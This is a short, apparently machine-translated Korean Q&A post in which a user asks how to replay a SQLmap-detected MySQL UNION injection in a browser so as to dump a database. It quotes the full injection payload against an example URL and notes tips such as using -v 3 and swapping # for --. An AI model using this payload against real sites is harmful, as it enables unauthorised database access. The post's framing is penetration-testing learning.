SQLmap 작동 방식을 이해하려고합니다. Sqlmap 트래픽 캡처
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
, 나는 데이터베이스를 덤프 할 수하는 SQLMaps를 사용하지만 어떻게 브라우저에서 같은 데이터베이스를 덤프 - 예를 들어
는 sqlmap 내 사이트에 주사를 발견? 다음 링크를 브라우저에 넣으려고했지만 작동하지 않습니다. -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
브라우저에서 아무런 결과가 나오지 않습니다. 나는/** /와 + 등을 넣는 다른 방법을 시도했지만 빨았습니다.
침투 테스트를 위해 Sqlmap에서 보내는 링크를 얻는 방법은 무엇입니까?
이 주사로 간단한 select version() 쿼리를 이용하는 방법은 무엇입니까?
아마도 실제로 작동하지 않습니까?
침투 테스트를 위해 Sqlmap에서 보내는 링크를 얻는 방법은 무엇입니까? 그냥 sqlmap 키를 사용하여 해결되었습니다. -v 3 이 주입으로 간단한 select version() 쿼리를 사용하는 방법 브라우저에서 #를 -로 변경하는 방법 –